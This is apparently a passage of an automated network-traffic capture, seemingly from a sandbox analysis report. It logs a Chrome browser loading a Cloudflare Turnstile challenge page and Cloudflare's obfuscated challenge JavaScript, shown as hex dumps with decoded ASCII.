                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                            referrer-policy: same-origin
                                                            document-policy: js-profiling
                                                            2025-01-07 19:24:57 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 36 35 34 62 63 32 38 36 63 37 64 30 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: Server: cloudflareCF-RAY: 8fe654bc286c7d0b-EWRalt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:57 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                            2025-01-07 19:24:57 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.849728104.18.95.414435496C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 19:24:58 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe654bc286c7d0b&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/djxe4/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 19:24:58 UTC331INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 19:24:58 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 117701
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fe654c2aaaa42b8-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 19:24:58 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 71 51 4c 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                                            2025-01-07 19:24:58 UTC1369INData Raw: 25 32 30 6f 75 74 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72
                                                            Data Ascii: %20out","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_failure":"Error","outdated_browser":"Your
                                                            2025-01-07 19:24:58 UTC1369INData Raw: 67 62 2c 67 6c 2c 67 77 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 66 33 2c 66 34 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 38 37 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 38 35 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 36 39 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 39 34 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 37 34 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 31 36 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 36 32 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28
                                                            Data Ascii: gb,gl,gw,gA,gB,gC,gG,gH,f3,f4){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1187))/1+parseInt(gI(1385))/2+parseInt(gI(1069))/3+parseInt(gI(994))/4*(-parseInt(gI(1374))/5)+-parseInt(gI(1016))/6*(-parseInt(gI(662))/7)+parseInt(gI(
                                                            2025-01-07 19:24:58 UTC1369INData Raw: 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 4e 4c 71 57 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 6a 29 7b 72 65 74 75 72 6e 20 68 28 69 2c 6a 29 7d 2c 27 6f 55 4a 76 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 66 78 52 49 46 27 3a 67 59 28 32 38 30 29 2c 27 5a 50 58 4b 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 79 4b 4c 58 44 27 3a 67 59 28 31 31 35 34 29 2c 27 6e 6c 48 67 76 27 3a 67 59 28 31 32 33 38 29 2c 27 6f 4f 69 4b 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 79 4e 48 43 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 51 63 4b 6c 6e 27 3a 66 75
                                                            Data Ascii: (h,i){return h+i},'NLqWn':function(h,i,j){return h(i,j)},'oUJvp':function(h,i){return h+i},'fxRIF':gY(280),'ZPXKf':function(h,i){return h===i},'yKLXD':gY(1154),'nlHgv':gY(1238),'oOiKt':function(h,i){return h-i},'yNHCa':function(h,i){return h>i},'QcKln':fu
                                                            2025-01-07 19:24:58 UTC1369INData Raw: 72 65 74 75 72 6e 20 78 5b 6a 5d 3d 3d 3d 76 6f 69 64 20 30 3f 27 75 27 3a 27 78 27 7d 65 6c 73 65 7b 69 66 28 6e 75 6c 6c 3d 3d 6a 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d 27 27 2c 47 3d 32 2c 48 3d 33 2c 49 3d 32 2c 4a 3d 5b 5d 2c 4b 3d 30 2c 4c 3d 30 2c 4d 3d 30 3b 4d 3c 6a 5b 68 30 28 31 32 31 30 29 5d 3b 4d 2b 3d 31 29 69 66 28 4e 3d 6a 5b 68 30 28 39 39 39 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 68 30 28 31 36 31 37 29 5d 5b 68 30 28 38 36 39 29 5d 5b 68 30 28 39 38 34 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d 21 30 29 2c 4f 3d 46 2b 4e 2c 4f 62 6a 65 63 74 5b 68 30 28 31 36 31 37 29 5d 5b 68 30 28 38 36 39 29 5d 5b 68 30 28 39 38 34 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 7b
                                                            Data Ascii: return x[j]===void 0?'u':'x'}else{if(null==j)return'';for(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;M<j[h0(1210)];M+=1)if(N=j[h0(999)](M),Object[h0(1617)][h0(869)][h0(984)](D,N)||(D[N]=H++,E[N]=!0),O=F+N,Object[h0(1617)][h0(869)][h0(984)](D,O))F=O;else{
                                                            2025-01-07 19:24:58 UTC1369INData Raw: 28 31 30 37 32 29 5d 28 64 5b 68 30 28 31 36 32 38 29 5d 28 4b 2c 31 29 2c 50 29 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 68 30 28 33 39 38 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 68 30 28 36 30 32 29 5d 28 30 29 2c 43 3d 30 3b 31 36 3e 43 3b 4b 3d 64 5b 68 30 28 37 34 30 29 5d 28 4b 3c 3c 31 2c 31 26 50 29 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 68 30 28 33 39 38 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 47 2d 2d 2c 30 3d 3d 47 26 26 28 47 3d 4d 61 74 68 5b 68 30 28 36 34 36 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 50 26 31
                                                            Data Ascii: (1072)](d[h0(1628)](K,1),P),o-1==L?(L=0,J[h0(398)](s(K)),K=0):L++,P=0,C++);for(P=F[h0(602)](0),C=0;16>C;K=d[h0(740)](K<<1,1&P),o-1==L?(L=0,J[h0(398)](s(K)),K=0):L++,P>>=1,C++);}G--,0==G&&(G=Math[h0(646)](2,I),I++),delete E[F]}else for(P=D[F],C=0;C<I;K=P&1
                                                            2025-01-07 19:24:58 UTC1369INData Raw: 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 36 34 36 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 33 28 31 35 37 36 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 33 28 33 30 31 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 68 33 28 33 30 31 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 36 34 36 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4e 3d 64 5b 68 33 28 31 34 34 38 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 68 33 28 31 35 37 36 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 33
                                                            Data Ascii: e 0:for(J=0,K=Math[h3(646)](2,8),F=1;K!=F;N=H&G,H>>=1,d[h3(1576)](0,H)&&(H=j,G=d[h3(301)](o,I++)),J|=(0<N?1:0)*F,F<<=1);O=d[h3(301)](e,J);break;case 1:for(J=0,K=Math[h3(646)](2,16),F=1;F!=K;N=d[h3(1448)](G,H),H>>=1,d[h3(1576)](0,H)&&(H=j,G=o(I++)),J|=d[h3
                                                            2025-01-07 19:24:58 UTC1369INData Raw: 67 4a 28 31 32 33 37 29 29 2c 66 36 3d 61 74 6f 62 28 67 4a 28 32 39 39 29 29 2c 65 4d 5b 67 4a 28 34 36 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 39 2c 64 2c 65 2c 66 2c 67 29 7b 69 39 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 69 39 28 31 34 34 33 29 5d 3d 69 39 28 34 36 33 29 2c 64 5b 69 39 28 31 35 38 38 29 5d 3d 69 39 28 31 36 30 37 29 2c 64 5b 69 39 28 33 32 36 29 5d 3d 69 39 28 38 31 30 29 2c 64 5b 69 39 28 31 30 34 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 69 39 28 34 35 30 29 5d 5b 69 39 28 31 30 32 39 29 5d 28 65 5b 69 39 28 31 30 34 32 29 5d 28 32 2c 66 29 2c 33 32 29 2c 65 4d 5b 69 39 28 35 38 35 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 61 29 7b 69 66 28
                                                            Data Ascii: gJ(1237)),f6=atob(gJ(299)),eM[gJ(464)]=function(i9,d,e,f,g){i9=gJ,d={},d[i9(1443)]=i9(463),d[i9(1588)]=i9(1607),d[i9(326)]=i9(810),d[i9(1042)]=function(h,i){return h<<i},e=d,f=1,g=1e3*eM[i9(450)][i9(1029)](e[i9(1042)](2,f),32),eM[i9(585)](function(ia){if(
